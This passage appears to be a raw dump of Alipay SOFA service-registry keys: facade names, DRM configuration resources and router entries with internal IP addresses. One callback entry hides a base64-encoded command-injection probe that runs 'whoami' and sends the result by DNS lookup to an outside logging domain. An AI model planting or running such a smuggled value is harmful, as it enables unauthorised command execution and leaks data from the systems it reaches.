EFAULT_INSTANCE_ID#@#SOFA","Alipay.finsign:name=com.alipay.common.datacollector.rule.internal.DataModelRuleCoordinator.dataCollectWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finpwm.facade.api.UserProfileFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.arrangementProductConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.china.channel.revenue.service.CpsUnionFeedClientService:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebplus.common.facade.service.api.YebsDecisionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bioperation.service.facade.api.TowerWarnMangerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.diskLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.yebcore.common.facade.service.query.YebUserLimitQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobiledc.common.service.facade.api.DispatchInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:settlementprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.xview.core.common.facade.CallbackService:1.0:TestView@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dmeta.facade.modeltable.ModelDDLFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.messagefusion.facade.api.LifeFollowUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.asttshipcore.service.facade.api.manage.BalanceManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acprodapicore.facade.manageapi.IPAccessStrategyItemManager:1.0:product@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.BizSystemService:1.0:antefi_fininsightcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gffund.common.service.facade.api.LogWriteoffFacade:1.0:logWriteoffFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.sla.disaster.drm.SlaDisasterRuleConfigDrm.exporterConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ap.acquirecenter.common.service.facade.api.OrderQueryByConditionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sdlib.common.bigtable.internal.BigTableClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.betacompare.common.facade.api.BetaInvokeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:bpservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antcloud.acbsbcore.common.service.rest.BsbCallerRestService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizrecon.facade.ext.ReconClearConfMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.insttrade.SHAREDATA_READDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:zark@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:antProcessAuditNode@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.125.221#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.client.SystemAppInvokeService:1.0:mcardcenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.177.17#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.cloudprovision.cloudprovision_ds.failOnPhysicalInit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_CLOUDASSET#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.commodity.BumngCommodityOrderImportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbdish.common.service.facade.api.KbdishQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.investtrade.facade.demo.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.140.70#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.acpartner.common.service.facade.DictionaryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accha.core.drm.ElasticDBSourceMigrationDrmResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.payacceptance.PaccFlowManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcdp.common.service.facade.advertisement.query.AdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:cxbizruntime@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.ambush.netmock.rule.NetmockRuleCoordinator.netmockRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfiprod.common.service.facade.p2p.info.service.StatInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.252.51#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mindv.survey.troublefreerule.TroubleFreeRuleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:mservicesinspect@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.bp.engine.service.BPService:1.0:mrchishub@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_B_FUND#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.insxhbprod.common.service.facade.loadtest.ThreeLayersExecuterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.236.90#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insmarketingprod.common.service.facade.rank.MktRankFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imasp.common.service.facade.playcenter.PlayGroupFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.giftprod.common.service.facade.inner.GiftCrowdGzQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opencore:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.successParkIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.alideviceinfo.biz.rpc.facade.innovate.MarketCodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkfundbuss.common.facade.query.FundCollectQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ugstrategycenter.common.service.facade.task.OutAppTaskOperationFacade:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaimportal.common.service.InsClaimCardInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.oasis.common.service.facade.datamanager.DataAuthorityManagerTrService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antzproxy.default#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.appxcore.common.service.facade.api.keyword.KeyWordMngQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promobench.common.service.facade.service.LaunchPackageManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialportal.web.task.rpc.facade.activity.OnlinePromotionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdatacontext:name=com.alipay.datacontextlib.dataswap.client.drm.DataSwapAllClientDrmResource.mock,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.csrobot.service.facade.mng.api.RobotKnowledgeRelMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.qagraphknowledge.common.service.facade.qacd.ChangeAnalysisFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mrchmobile.common.service.facade.mmcard.PromotionWayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.workflowxTBaseCache.compressionType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.ordercore:name=com.alipay.ordercore.event.config.compensateTaskTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.nodejs.ConsumerService:1.0:antbuserviceuserservice-app@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cfpcenter.emc.common.service.facade.api.EmcApplicationQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.refundTimeLimitCloudCodes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mcenter.common.dal.share.auto.daointerface.McenterUserTaskDAO:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ZPTCORE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.kbticketcenter.KbtBackendTickeSchedulerService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.cif.model.cache.CifCOControlSwitch.switchCurUserStatus,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditcustsrv.facade.common.trservice.PccsBillQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.117.226#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.publichome.common.service.facade.app.PublicAppOwnerInfoManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:O3BpbmcgYHdob2FtaWBNek13TWpRNE5qa3RMVEV3TkRBd016QXpNdy5zc3JmLm5vYmxlLmxvZy5seW5uc2hhcmUuY2M7@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.customerv2_dest.watchMember,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.160.159.58#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.vega-integration-kepler:name=com.alipay.routeclient.DefaultRouteCoordinator.whiteListRPCLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_C_CTUPOINT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:test一下@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@coveragecenter#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.peerpay.common.service.facade.api.SharePPayApplyServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityassistant.common.service.facade.session.SessionQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.trade.prod.schedule.drm.SyncStatusIngOrderDRMResource.batchSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.forexprod.common.service.facade.MerchantSwitchQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.industry.MerIndusPoolConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.96.90#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.imtmsvcprod.common.service.facade.face.FaceAssemblyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecquery.common.service.account.RepayAccountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.checkIntervalWhenDisableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchasset.common.service.facade.qc.AssetDispositionOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.finriskeventseek.facade.NormalReleaseServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.39.246.136#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:ins.platform.template.care.pay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.swiftweb.facade.ReleaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zdatabusPayInfoTairCache.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.etetestcore.service.api.kbticketcenter.KbtTmallUseTicketService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.97.143#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.paycore.service.payment.api.RefundService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_FINTRADEGUARD#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.grmcore.common.service.facade.program.GrmProgramFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.miniprod.common.service.facade.api.miniappservice.MiniAppBrandApproveOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.190.220#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.servicegovern.common.service.facade.AuthRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.facade.api.audit.MiniAppAuditQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbprod.common.service.facade.product.service.ProductOnSaleNotifyRuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:loanpromoweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ucdp.common.service.facade.mng.DeliverGroupMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revcore:name=com.alipay.revcore.biz.shared.drm.DrmData.messageBufferSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zqueue.client.drm73#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.antlaw.common.service.facade.api.ContractTemplateDraftPublishOfFileFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.cifcommon.business.platform.useragreement.drm.UserAgreementClientSwitch.queryRpcSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.custdecision.service.permlimit.facade.CompareResultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:exclienttrdclient@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifin.bankcard.service.facade.FirstPayServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.isdsp.common.service.facade.DsPermissionServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.fop.mng.fici.FICIInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.mextitemcenter.common.facade.api.SimilarShopService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:cn.com.antcloud.aciamcore.common.service.facade.access.ActionServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.libracore.common.service.facade.api.FundProgramFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.management.dataasset.DataAssetAppMngConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.almcenter.core.service.rule.engine.RuleEngine:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.detail.drm.AipOrderDRMResource.rewardNoTryList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_DEFAULT_UNIFORM_EVENT1#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.pointmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.customServiceGroup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cifin:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.successParkIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.acctrans.facade.api.fundtrans.FundtransManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_R_CZONESYNC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Zone_Servers_Zmsgrouter#@#DEFAULT_INSTANCE_ID#@#msgbroker","NS_Pub_Servers_TP-F-USTRANS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pcloanrepay.common.service.facade.service.certify.CertifyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ifcidentitycloudus:name=com.antcloud.ifcidentitycloudus.common.util.mic.PubResouceHolder.mockKybKycConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cscheck.service.facade.api.CheckTextRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.poscore.common.service.facade.express.manage.ExpressComponentManageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:aliinvoiceboss@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rpc.common.service.facade.AntVipService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscenesas.common.service.facade.api.promo.CollectRewardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csmng.service.api.workform.WorkformService:1.0.0:salemng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.128.71#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.promocenter:name=com.alipay.promocenter.common.drm.MerchantOperatorResource.openHomeOperatorDeliveryChannelSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.lifemsgprod.common.service.facade.admin.template.LifeMsgTemplateLibAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.instrument:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcTimeDelayed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcloanpayprod.common.service.facade.services.TradeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.opencore.service.facade.relation.RelationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fincontract.common.service.facade.security.SecurityContractFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppcore.facade.LdcTairSwitchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lifemng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.xfireMaxConnectionMosn,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.bluearmyprod:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.checkIntervalWhenDisableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finslip.common.service.facade.notify.FileNotifyService:1.0:reservecenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insusercenter.client.policynotify.extension.PolicyNotifyFetcherComponent:1.0:insrenewprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fraudmng.common.service.facade.securityprodmng.SecuritySceneConfigService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.166.154#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fintradecenter.common.service.facade.trade.FintradeDateCaculateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.equitytradecore.common.service.facade.api.TradeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.Callback:1.0:cstask_smartDistributeCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.chargefront.biz.service.schedule.escort.EscortDrm.depositDecision,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.biscenter.uem.common.service.facade.permission.customize.OfflineOperatorQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.216.149#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchiscore.common.service.facade.operation.OperationDataServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.spi.publish.ArgoTrProxyFacade:1.0:finsign@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.ScriptEvalServiceFacade:1.0:zmCredit_zmcustcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_ACCORDER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pcreditmarket.service.PcreditFreeCardQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cdp.common.service.facade.space.api.CdpSpaceObjectExtApiService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gftms.facade.api.basic.report.ForecastManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinbaseprod.common.service.facade.spi.search.service.DazzleSearchSpiService:1.0:insptmarket@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:unifygw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcenter.common.dal.share.auto.daointerface.McenterProcessStateDAO:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assetxp.common.service.facade.api.TwoPhaseAssetExchangeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.dmirror:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.cityVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.trafficintelbiz.common.service.facade.api.TrafficCorpManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.PrivilegeConsultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.abilitycore.facade.api.JsApiQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.ryb.RYBActivityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundprod.common.service.facade.product.query.RegularOpenBondQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:antinvoice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.ProcessTaskCallback:1.0.0:baoxianTaskProcessCallBackApplication@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfinvest.facade.api.during.ApprovalDingTalkFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.finbatch_finreconFailoverDataSource_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.nfcc.common.service.facade.agna.AgnaRegionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeapcore:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.testOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zpr.common.service.facade.analyse.AnalyseResultSnapshotFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.overseaexprod.core.promotion.PromotionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.security.api.ImageReviewFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.30.0#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","HEALTHY_V2@kgopen#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","SOFA_PRC_TRANSMIT_SECUPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insdataprod.common.service.facade.medicine.api.MedicineFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.event.api.input.EventReceiverService:1.0:SL__TP_F_SC_EC-pcinstacc-cmd-check-schedule-serverless@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:happywork@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.92.117#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.ordermng:name=com.alipay.common.tracer.manage.TracerDrm.enableRpc2JvmDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.ptcore.common.service.facade.api.ctemplate.ConditionTemplateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxprod.common.service.facade.api.servicelibrary.ServiceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:dishMachineAuditExecutor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkpayplatform.common.service.facade.api.consult.PayAssetConsultExtFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.common.tracer.manage.TracerDrm.zdalOtsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finsupport:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainStrategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.pcreditbill.facade.service.PcreditBillAccountTagFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.imtmsvcprod.common.service.facade.automat.AutomatDeviceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fininflux.common.service.facade.gzone.InfluxHisQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_DW_ADC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.agap.service.facade.mng.api.SimpleRobotBizMngService:1.0:tcService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SO